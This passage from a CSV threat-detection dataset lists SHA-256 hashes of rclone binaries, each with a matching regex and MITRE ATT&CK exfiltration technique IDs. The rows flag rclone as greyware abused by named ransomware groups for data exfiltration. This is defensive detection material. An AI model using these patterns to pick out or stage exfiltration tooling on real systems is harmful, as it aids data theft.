Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9730d3b8e639662a479982dbb6e6828ba70258620a2613dd939a2cfe90f260ff*",".{0,1000}9730d3b8e639662a479982dbb6e6828ba70258620a2613dd939a2cfe90f260ff.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*976161d326f8980972cfbbde397c28176cff14d5fe23c963283fdf5b25d2a32c*",".{0,1000}976161d326f8980972cfbbde397c28176cff14d5fe23c963283fdf5b25d2a32c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9790d2ca4e5bae3d83a3f53b22027862388ae0057649beff8d74418993956c42*",".{0,1000}9790d2ca4e5bae3d83a3f53b22027862388ae0057649beff8d74418993956c42.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9847ecb1315ea779736dc3fbf00edeb3a9c42613200bd538092c4b0987d90f35*",".{0,1000}9847ecb1315ea779736dc3fbf00edeb3a9c42613200bd538092c4b0987d90f35.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*98552bc999333d460171ad07f72dc6c30bd017c7baef2cdfa6c9f1f5d661f312*",".{0,1000}98552bc999333d460171ad07f72dc6c30bd017c7baef2cdfa6c9f1f5d661f312.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*986555b1498329e66785f700ed25f84d0fb67fbf398215a4049d9846f23100a4*",".{0,1000}986555b1498329e66785f700ed25f84d0fb67fbf398215a4049d9846f23100a4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9897be0c0beaddb4b8b81adb5fca1a0e7e702725086cfdda8b1e909febca2c05*",".{0,1000}9897be0c0beaddb4b8b81adb5fca1a0e7e702725086cfdda8b1e909febca2c05.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*98c408337b29f4a45a14339a1e1ff0124be1446aa784ec5089ed2ed07e14cf43*",".{0,1000}98c408337b29f4a45a14339a1e1ff0124be1446aa784ec5089ed2ed07e14cf43.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*98ff939169135f9fa2a57e48ef52a97eea050abc42a6362da8a180e56e118f54*",".{0,1000}98ff939169135f9fa2a57e48ef52a97eea050abc42a6362da8a180e56e118f54.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9906fa1de74605a1fa79132c436722654c4b0c941053f07eb3aa85ac4f09123f*",".{0,1000}9906fa1de74605a1fa79132c436722654c4b0c941053f07eb3aa85ac4f09123f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*995dc125d29852e24beacc8f61871fb3c51859d0130d904da9d81fced3779a51*",".{0,1000}995dc125d29852e24beacc8f61871fb3c51859d0130d904da9d81fced3779a51.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*99daaa95867cdf0758ec1d5d7f2ebdb3bf74c8c8602e2aaf888e637163d2ebdd*",".{0,1000}99daaa95867cdf0758ec1d5d7f2ebdb3bf74c8c8602e2aaf888e637163d2ebdd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9a2d9073b4ad268a2bce887596f5008c8c92cb74fec88b54f2152a3bed181b25*",".{0,1000}9a2d9073b4ad268a2bce887596f5008c8c92cb74fec88b54f2152a3bed181b25.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9a2f0cd9aa7f2380f9d9b3eaca844d9e05219eee732329d544e4b76b75b5d018*",".{0,1000}9a2f0cd9aa7f2380f9d9b3eaca844d9e05219eee732329d544e4b76b75b5d018.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9a9f29ed242baec12d423e4cf21b1322ebac1fe738d72f64a3b1b4a45c94b4bf*",".{0,1000}9a9f29ed242baec12d423e4cf21b1322ebac1fe738d72f64a3b1b4a45c94b4bf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9b8819db42c86e4b7adb6b9fbc1bb8acd178fa05f74c4cdda27f3b5aa64deb4c*",".{0,1000}9b8819db42c86e4b7adb6b9fbc1bb8acd178fa05f74c4cdda27f3b5aa64deb4c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9baa9ae150749a196e3cd03765655c6a9c9731fbdfcb11efc22d14a4b10f7346*",".{0,1000}9baa9ae150749a196e3cd03765655c6a9c9731fbdfcb11efc22d14a4b10f7346.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9c0ae5d41ec30487350699a26406dbb0893b639f4702630ac9d735ad6c15aa5a*",".{0,1000}9c0ae5d41ec30487350699a26406dbb0893b639f4702630ac9d735ad6c15aa5a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9c1f64c5353fef38a4f90ee34a6b670f5e38a21cd629960c7eb7de50ed5ad460*",".{0,1000}9c1f64c5353fef38a4f90ee34a6b670f5e38a21cd629960c7eb7de50ed5ad460.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9c20d2016bd5f7437ec4b304ed39e17ccd1c0882c29f9ee37dfe81c9f1ea6015*",".{0,1000}9c20d2016bd5f7437ec4b304ed39e17ccd1c0882c29f9ee37dfe81c9f1ea6015.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9cb6e00ae09b73b289f3a447cc5ebbd16fabc4134c606bc25c0f4a70f715485f*",".{0,1000}9cb6e00ae09b73b289f3a447cc5ebbd16fabc4134c606bc25c0f4a70f715485f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9cd5f8810741b08aac49f12898dc623ce070f21f39820b1916361acd2522b982*",".{0,1000}9cd5f8810741b08aac49f12898dc623ce070f21f39820b1916361acd2522b982.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9d64672adf39e728aabe327e344f0735ed2d8cfd8d96a39ca4848a771f48e42d*",".{0,1000}9d64672adf39e728aabe327e344f0735ed2d8cfd8d96a39ca4848a771f48e42d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9d71d19aa4fa05a8829650c03387de1e7aea56635a1568e725463a8db3457708*",".{0,1000}9d71d19aa4fa05a8829650c03387de1e7aea56635a1568e725463a8db3457708.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9d756b853f27ac18d6b0b321e1dacef18d98fdbb3fa7d7500fce5d09cb63dd52*",".{0,1000}9d756b853f27ac18d6b0b321e1dacef18d98fdbb3fa7d7500fce5d09cb63dd52.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9d7c62cfabf136368543cab714f0ba1ba1165a8d4fd5e535736976ebb95303c5*",".{0,1000}9d7c62cfabf136368543cab714f0ba1ba1165a8d4fd5e535736976ebb95303c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9dfed608d8c377ee0d9fc5aefcfb535155fd0693b9bc804c1f8311b2ac1dcad1*",".{0,1000}9dfed608d8c377ee0d9fc5aefcfb535155fd0693b9bc804c1f8311b2ac1dcad1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9e54ead1385e23d4b5c663545001d13db7c653225fe997fcf7d6092ccd2a221a*",".{0,1000}9e54ead1385e23d4b5c663545001d13db7c653225fe997fcf7d6092ccd2a221a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9e71f08fe3818175111038f681747563b50d4673ec9b4404446bd2a7bb7d5063*",".{0,1000}9e71f08fe3818175111038f681747563b50d4673ec9b4404446bd2a7bb7d5063.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9e7b19f19410ca164f057020918c128e8b6cf603c24386f80ddd7ef3cd9ae5bc*",".{0,1000}9e7b19f19410ca164f057020918c128e8b6cf603c24386f80ddd7ef3cd9ae5bc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9e900a0da021bf0cc58e16ccaea35d8ffc115aed8fb99d0deed5b3c01e822ad0*",".{0,1000}9e900a0da021bf0cc58e16ccaea35d8ffc115aed8fb99d0deed5b3c01e822ad0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9ed99f3c7be08a47125d73169959a738b152b8c2dcfac42fca34e5edb0448a88*",".{0,1000}9ed99f3c7be08a47125d73169959a738b152b8c2dcfac42fca34e5edb0448a88.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9ef83833296876f3182b87030b4f2e851b56621bad4ca4d7a14753553bb8b640*",".{0,1000}9ef83833296876f3182b87030b4f2e851b56621bad4ca4d7a14753553bb8b640.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9efbe8b459a63d573e27712d030b3c36e7cdc92c1f33461c401ca81cdb0e8e71*",".{0,1000}9efbe8b459a63d573e27712d030b3c36e7cdc92c1f33461c401ca81cdb0e8e71.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9f2bbb3d0ecd30411181adfe61a09f64e7d3003e55703d5ab5433cb68b905038*",".{0,1000}9f2bbb3d0ecd30411181adfe61a09f64e7d3003e55703d5ab5433cb68b905038.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9f7050d57a380a76aab9f89fa7d44884db808b526261fad94a62797c831e1cbf*",".{0,1000}9f7050d57a380a76aab9f89fa7d44884db808b526261fad94a62797c831e1cbf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
